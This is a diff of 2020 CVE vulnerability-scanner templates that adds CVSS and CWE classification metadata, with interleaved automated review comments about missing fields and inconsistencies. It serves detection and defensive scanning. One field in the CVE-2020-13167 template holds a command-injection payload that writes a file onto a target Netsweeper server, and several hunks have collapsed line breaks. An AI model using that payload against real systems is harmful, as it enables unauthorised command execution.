b/cves/2020/CVE-2020-11854.yaml @@ -14,6 +14,11 @@ info: Originated from Metasploit module (#14654). tags: cve,cve2020,ucmdb,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-11854 + cwe-id: CWE-798 requests: - method: GET 
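Review bot: The `classification` block added for CVE-2020-11710 carries no `cwe-id`, unlike most of the blocks in this diff; the same omission appears in CVE-2020-11853, CVE-2020-14179, CVE-2020-14864, CVE-2020-14882, CVE-2020-14883, CVE-2020-15505, CVE-2020-16139 and CVE-2020-19625. If the source advisory publishes no CWE for these entries, a short comment such as `# no cwe-id published for this CVE` under `cve-id` would make the gap deliberate rather than an oversight; otherwise the id should be filled in so the field set stays uniform across the templates. This hunk also raises the severity from `info` to `critical` in one step, which is consistent with the 9.80 score but worth a one-line mention in the commit message.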
diff --git a/cves/2020/CVE-2020-11930.yaml b/cves/2020/CVE-2020-11930.yaml
index 8561563078..9f8898694d 100644
--- a/cves/2020/CVE-2020-11930.yaml
+++ b/cves/2020/CVE-2020-11930.yaml
@@ -10,6 +10,11 @@ info:
     - https://wpscan.com/vulnerability/10181
     - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
   tags: cve,cve2020,wordpress,xss
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-11930
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml
index 1f966e8dc3..e5ec23bd48 100644
--- a/cves/2020/CVE-2020-11978.yaml
+++ b/cves/2020/CVE-2020-11978.yaml
@@ -9,6 +9,11 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
     - https://twitter.com/wugeej/status/1400336603604668418
   tags: cve,cve2020,apache,airflow,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.80
+    cve-id: CVE-2020-11978
+    cwe-id: CWE-77
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml
index 043b9aeaa0..18b959d535 100644
--- a/cves/2020/CVE-2020-11991.yaml
+++ b/cves/2020/CVE-2020-11991.yaml
@@ -8,6 +8,11 @@ info:
   description: |
     When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.
   reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2020-11991
+    cwe-id: CWE-611
 
 requests:
   - method: POST
diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml
index 60bcb223fb..0ee177bbaf 100644
--- a/cves/2020/CVE-2020-12054.yaml
+++ b/cves/2020/CVE-2020-12054.yaml
@@ -7,6 +7,11 @@ info:
   description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
   reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
   tags: cve,cve2020,wordpress,xss,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-12054
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml
index 32023cb990..696fd1ce4f 100644
--- a/cves/2020/CVE-2020-12116.yaml
+++ b/cves/2020/CVE-2020-12116.yaml
@@ -7,6 +7,11 @@ info:
   description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
   tags: cve,cve2020,zoho,lfi
   reference: https://github.com/BeetleChunks/CVE-2020-12116
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2020-12116
+    cwe-id: CWE-22
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-12720.yaml b/cves/2020/CVE-2020-12720.yaml
index 289db507b6..a187f2e53f 100644
--- a/cves/2020/CVE-2020-12720.yaml
+++ b/cves/2020/CVE-2020-12720.yaml
@@ -7,6 +7,11 @@ info:
   description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
   reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
   tags: cve,cve2020,vbulletin,sqli
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-12720
+    cwe-id: CWE-89,CWE-306
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml
index 8216d0e966..3f57c57e69 100644
--- a/cves/2020/CVE-2020-12800.yaml
+++ b/cves/2020/CVE-2020-12800.yaml
@@ -7,6 +7,11 @@ info:
   description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
   reference: https://github.com/amartinsec/CVE-2020-12800
   tags: cve,cve2020,wordpress,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-12800
+    cwe-id: CWE-434
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml
index a1f55821f9..481f68259a 100644
--- a/cves/2020/CVE-2020-13117.yaml
+++ b/cves/2020/CVE-2020-13117.yaml
@@ -8,6 +8,11 @@ info:
   reference:
     - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
   tags: cve,cve2020,wavlink,rce,oob
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-13117
+    cwe-id: CWE-77
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml
index 961d153f44..be49883637 100644
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@@ -11,6 +11,11 @@ info:
     - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
   additional-fields:
     hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out'
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-13167
+    cwe-id: CWE-78
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml
index 93175bfeeb..943d37ec28 100644
--- a/cves/2020/CVE-2020-13483.yaml
+++ b/cves/2020/CVE-2020-13483.yaml
@@ -3,10 +3,15 @@ id: CVE-2020-13483 info: name: Bitrix24 through 20.0.0 allows XSS author: pikpikcu - severity: high + severity: medium reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. tags: cve,cve2020,xss,bitrix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13483 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml index 844a1401f5..13693b822a 100644 --- a/cves/2020/CVE-2020-13700.yaml +++ b/cves/2020/CVE-2020-13700.yaml @@ -10,6 +10,11 @@ info: It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. tags: cve,cve2020,wordpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-13700 + cwe-id: CWE-639 requests: - method: GET diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml index 4d8a08fa63..b9095c970e 100644 --- a/cves/2020/CVE-2020-13927.yaml +++ b/cves/2020/CVE-2020-13927.yaml 
@@ -5,6 +5,14 @@ info:
   author: pdteam
   severity: critical
   tags: cve,cve2020,apache,airflow,unauth
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-13927
+  description: "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default"
+  reference:
+    - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
+    - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml
index be27c3f3a9..28936101f5 100644
--- a/cves/2020/CVE-2020-13937.yaml
+++ b/cves/2020/CVE-2020-13937.yaml
@@ -15,6 +15,11 @@ info:
     - https://kylin.apache.org/docs/release_notes.html
     - https://s.tencent.com/research/bsafe/1156.html
   tags: cve,cve2020,apache
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2020-13937
+    cwe-id: CWE-922
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-13942.yaml b/cves/2020/CVE-2020-13942.yaml
index 6f29058963..45757b968d 100644
--- a/cves/2020/CVE-2020-13942.yaml
+++ b/cves/2020/CVE-2020-13942.yaml
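Review bot: The new `description` and `reference` keys for CVE-2020-13927 are appended below `classification`, whereas every other template touched in this diff keeps `classification` as the last key of `info`; placing them above `tags` would keep the key order uniform (CVE-2020-15148, CVE-2020-15500 and CVE-2020-1938 add `description` after `cwe-id` in the same way). The description is also a single very long double-quoted scalar, which the quoting is only needed for because of the backticks and the `[api]` bracket; `description: |` with the text wrapped over a few lines would read better and matches how the other templates already hold long text. The rest of the hunk is consistent with the other entries.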
@@ -15,6 +15,11 @@ info:
     - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
     - https://twitter.com/chybeta/status/1328912309440311297
   tags: cve,cve2020,apache,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-13942
+    cwe-id: CWE-74
 
 requests:
   - method: POST
diff --git a/cves/2020/CVE-2020-14092.yaml b/cves/2020/CVE-2020-14092.yaml
index d23c7a5782..50f652bb22 100644
--- a/cves/2020/CVE-2020-14092.yaml
+++ b/cves/2020/CVE-2020-14092.yaml
@@ -7,6 +7,11 @@ info:
   description: WordPress Payment Form For Paypal Pro 'query' parameter allows for any unauthenticated user to perform SQL queries with result output to a web page in JSON format.
   reference: https://wpscan.com/vulnerability/10287
   tags: cve,cve2020,wordpress,wp-plugin,sqli
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-14092
+    cwe-id: CWE-89
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-14179.yaml b/cves/2020/CVE-2020-14179.yaml
index 116f824ef7..d586846e72 100644
--- a/cves/2020/CVE-2020-14179.yaml
+++ b/cves/2020/CVE-2020-14179.yaml
@@ -7,6 +7,10 @@ info:
   description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.
   reference: https://jira.atlassian.com/browse/JRASERVER-71536
   tags: cve,cve2020,atlassian,jira
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2020-14179
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-14181.yaml b/cves/2020/CVE-2020-14181.yaml
index d50f1e806d..a71ed9dfb5 100644
--- a/cves/2020/CVE-2020-14181.yaml
+++ b/cves/2020/CVE-2020-14181.yaml
@@ -9,6 +9,11 @@ info:
     - https://jira.atlassian.com/browse/JRASERVER-71560
     - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html
   tags: cve,cve2020,atlassian,jira
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2020-14181
+    cwe-id: CWE-200
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml
index 5cbe2e48a3..e260ce4ca9 100644
--- a/cves/2020/CVE-2020-14413.yaml
+++ b/cves/2020/CVE-2020-14413.yaml
@@ -7,6 +7,11 @@ info:
   reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
   description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
   tags: cve,cve2020,nedi,xss
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-14413
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml
index 65f3b7b0f5..f46615666a 100644
--- a/cves/2020/CVE-2020-14864.yaml
+++ b/cves/2020/CVE-2020-14864.yaml
@@ -10,6 +10,10 @@ info:
     - https://www.oracle.com/security-alerts/cpuoct2020.html
   additional-fields:
     cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2020-14864
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml
index 8544701f97..50635623d5 100644
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
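Review bot: In the CVE-2020-14864 hunk the pre-existing `additional-fields.cvss` line (a `CVSS:3.0` vector) now sits directly above the new `classification.cvss-metrics` (a `CVSS:3.1` vector for the same CVE), leaving two copies of the scoring data that can silently drift apart. Since `classification` is the field this diff standardises on, the `additional-fields` block should be removed in the same change (`-  additional-fields:` / `-    cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'`) rather than left as a stale duplicate. This block is also one of the few in the diff without a `cwe-id`.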
@@ -18,6 +18,10 @@ info: attacker with network access via HTTP to compromise the server. Successful attacks of this vulnerability can result in takeover. tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14882 requests: - raw: diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index 9deaa4c983..92e76199c0 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -3,10 +3,14 @@ id: CVE-2020-14883 info: name: Oracle WebLogic Server Administration Console Handle RCE author: pdteam - severity: critical + severity: high description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-14883 requests: - method: POST diff --git a/cves/2020/CVE-2020-15129.yaml b/cves/2020/CVE-2020-15129.yaml index a40edb0ae6..3b46eec92a 100644 --- a/cves/2020/CVE-2020-15129.yaml +++ b/cves/2020/CVE-2020-15129.yaml 
@@ -7,6 +7,11 @@ info:
   description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios.
   reference: https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik
   tags: cve,cve2020,traefik,redirect
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.70
+    cve-id: CVE-2020-15129
+    cwe-id: CWE-601
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml
index 247fac361d..1d65d8a045 100644
--- a/cves/2020/CVE-2020-15148.yaml
+++ b/cves/2020/CVE-2020-15148.yaml
@@ -3,11 +3,17 @@ id: CVE-2020-15148
 info:
   name: Yii 2 (yiisoft/yii2) RCE
   author: pikpikcu
-  severity: high
+  severity: critical
   reference:
     - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
     - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
   tags: cve,cve2020,rce,yii
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.00
+    cve-id: CVE-2020-15148
+    cwe-id: CWE-502
+  description: "Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory."
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml
index 474fa19f0a..e483393043 100644
--- a/cves/2020/CVE-2020-15227.yaml
+++ b/cves/2020/CVE-2020-15227.yaml
@@ -3,7 +3,7 @@ id: CVE-2020-15227
 info:
   name: Nette Framework RCE
   author: becivells
-  severity: high
+  severity: critical
   description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-15227
@@ -11,6 +11,11 @@ info:
     - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
     - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
   tags: cve,cve2020,nette,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-15227
+    cwe-id: CWE-74
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml
index 910bd856be..b197b0e2de 100644
--- a/cves/2020/CVE-2020-15500.yaml
+++ b/cves/2020/CVE-2020-15500.yaml
@@ -8,6 +8,12 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-15500
     - https://github.com/maptiler/tileserver-gl/issues/461
   tags: cve,cve2020,xss,tileserver
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-15500
+    cwe-id: CWE-79
+  description: "An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS."
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-15505.yaml b/cves/2020/CVE-2020-15505.yaml
index 15ac2adc6c..1877acd2d4 100644
--- a/cves/2020/CVE-2020-15505.yaml
+++ b/cves/2020/CVE-2020-15505.yaml
@@ -16,6 +16,10 @@ info:
     - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10
     - https://github.com/orangetw/JNDI-Injection-Bypass
   tags: cve,cve2020,mobileiron,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-15505
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml
index 4a4140cb1c..7ae06a5513 100644
--- a/cves/2020/CVE-2020-15568.yaml
+++ b/cves/2020/CVE-2020-15568.yaml
@@ -7,6 +7,11 @@ info:
   description: TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
   reference: https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
   tags: cve,cve2020,terramaster,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-15568
+    cwe-id: CWE-913
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-15920.yaml b/cves/2020/CVE-2020-15920.yaml
index e0457058b0..983229407e 100644
--- a/cves/2020/CVE-2020-15920.yaml
+++ b/cves/2020/CVE-2020-15920.yaml
@@ -7,6 +7,11 @@ info:
   description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required.
   reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
   tags: cve,cve2020,mida,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-15920
+    cwe-id: CWE-78
 
 requests:
   - method: POST
diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml
index 12f3ac20ab..d94b86da6f 100644
--- a/cves/2020/CVE-2020-16139.yaml
+++ b/cves/2020/CVE-2020-16139.yaml @@ -3,11 +3,15 @@ id: CVE-2020-16139 info: name: Cisco 7937G Denial-of-Service Reboot Attack author: pikpikcu - severity: low + severity: high description: | A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. reference: https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ tags: cve,cve2020,dos,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2020-16139 requests: - raw: diff --git a/cves/2020/CVE-2020-16846.yaml b/cves/2020/CVE-2020-16846.yaml index 9cf24f5d88..372a0572b7 100644 --- a/cves/2020/CVE-2020-16846.yaml +++ b/cves/2020/CVE-2020-16846.yaml @@ -13,6 +13,11 @@ info: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 tags: cve,cve2020,saltstack + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-16846 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml index 495e9c38e7..f126ba25cf 100644 --- a/cves/2020/CVE-2020-16952.yaml +++ b/cves/2020/CVE-2020-16952.yaml 
@@ -3,13 +3,18 @@ id: CVE-2020-16952
 info:
   name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE
   author: dwisiswant0
-  severity: critical
+  severity: high
   description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.
   reference:
     - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
     - https://srcincite.io/pocs/cve-2020-16952.py.txt
     - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
   tags: cve,cve2020,sharepoint,iis
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.80
+    cve-id: CVE-2020-16952
+    cwe-id: CWE-346
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml
index f448fae016..dc16edbe43 100644
--- a/cves/2020/CVE-2020-17362.yaml
+++ b/cves/2020/CVE-2020-17362.yaml
@@ -7,6 +7,11 @@ info:
   description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
   reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
   tags: cve,cve2020,wordpress,xss,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-17362
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml
index 17c80dd210..323ddb2eba 100644
--- a/cves/2020/CVE-2020-17453.yaml
+++ b/cves/2020/CVE-2020-17453.yaml
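Review bot: The `cvss-metrics` vector added for CVE-2020-16952 begins with `AV:L` (local attack vector), yet the template is an HTTP check against a remote host and the severity is being lowered from `critical` to `high` on the strength of the 7.80 score that vector produces. It is worth confirming the vector was taken from the right advisory entry before the downgrade lands, since a mismatched vector would make this one of the few templates whose classification contradicts its own request section. The remainder of the hunk follows the pattern used by the other entries.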
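Review bot: The `reference` context line for CVE-2020-17362 (Nova Lite theme) cites `https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4`, which is byte-for-byte the URL used by CVE-2020-12054 (Catch Breadcrumb plugin) earlier in this same diff; one of the two looks like a copy-paste slip. Since this commit is already touching the metadata of both templates it is a good moment to verify which advisory each entry should cite and correct the wrong one.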
@@ -7,6 +7,11 @@ info:
   description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
   tags: xss,wso2,cve2020,cve
   reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-17453
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml
index bbcd6072f2..d6a5b88323 100644
--- a/cves/2020/CVE-2020-17496.yaml
+++ b/cves/2020/CVE-2020-17496.yaml
@@ -7,6 +7,11 @@ info:
   description: |
